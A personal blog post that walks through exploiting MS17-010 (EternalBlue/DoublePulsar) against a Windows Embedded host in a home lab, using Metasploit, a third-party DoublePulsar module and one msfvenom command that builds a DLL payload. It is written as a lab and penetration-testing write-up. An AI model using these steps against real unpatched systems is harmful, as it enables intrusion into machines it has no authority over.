Few weeks ago I was asked to help a bit with exploitation of MS17_010 for one of the hosts found in the pentest project scope. Below you'll find more details about it. Here we go...
This time we'll start here:
Let's say: during our pentest/project we have to check some scope and for example we performed some basic 'initial port scan' to look around for available hosts and/or services. That's how we found that one of the target host(s) is vulnerable to CVE-2017-0144.
To recreate this scenario I decided to prepare a small LAB on my localhost and check what I'm able to do from Kali VM ;)
Environment
During the project-scan our results was similar to those presented on the screen below:
In case of CVE-2017-0144 I was pretty sure: if machine is vulnerable we should get a shell, right?
So why was the project-target-host "a problem"? ;)
To continue I used Kali VM and Windows Embedded. :) Don't be surprised when during your "network scans" you'll see ports like those presented below:
Probably it'll be a Windows Embedded box. And that was the case this time.
Check #01
When my LAB was ready I continued tests and started Metasploit against my local WindowsEmbedded hosts. So far - we should be somewhere here:
So far, so good. :)
At this 'stage' I changed MSF module to the next one presented on the screen below:
So Neo ;) Can you see why this is not a good way to pwn this host? Let's move forward for a hint on the screen below:
Got it? ;> If not: check again your banners (from scan logs). Then read 'show options' in MSF if you don't want to read more about it.
Check #02
So after a while - that's how I landed here (thanks!):
After reading the post I was preparing my self to some 'binary adventures' ;) ...and that's how I found this github resource (thanks!):
After reading README and extracting all the files we should be somewhere here - reading our current poc module (smb_doublepulsar_rce):
If you'll next read the (ruby) poc located in extracted directories - you'll see "the difference" (according to Capt. Meelo's post - as you can see on the screen above - I even tried to comment if-else check ;) anyway):
It looks like you need to install wine to continue - so if you're ready we should be somewhere here (with our new MSF module added to our resources):
Well, well, well... Should we try to recreate the DLL one more time? I believe so:
# msfvenom -p windows/exec cmd=calc -f dll -o embedrap.dll
We should be somewhere here:
Continuing:
Looks line done. ;)
Of course there are few other interesting files in that extracted directories...
... but I'll leave it to the Reader as an exercise. ;)
References
If you're looking for more details about this bug and/or how to patch it - check the links below:
- https://en.wikipedia.org/wiki/EternalBlue
- https://nvd.nist.gov/vuln/detail/cve-2017-0144
- https://www.rapid7.com/blog/post/2017/04/18/the-shadow-brokers-leaked-exploits-faq/
- https://www.rapid7.com/db/modules/exploit/windows/smb/smb_doublepulsar_rce/
- https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
- https://captmeelo.com/category/pentest
- https://github.com/s5uraj/doublepulsar
See you next time!
Cheers
Brak komentarzy:
Prześlij komentarz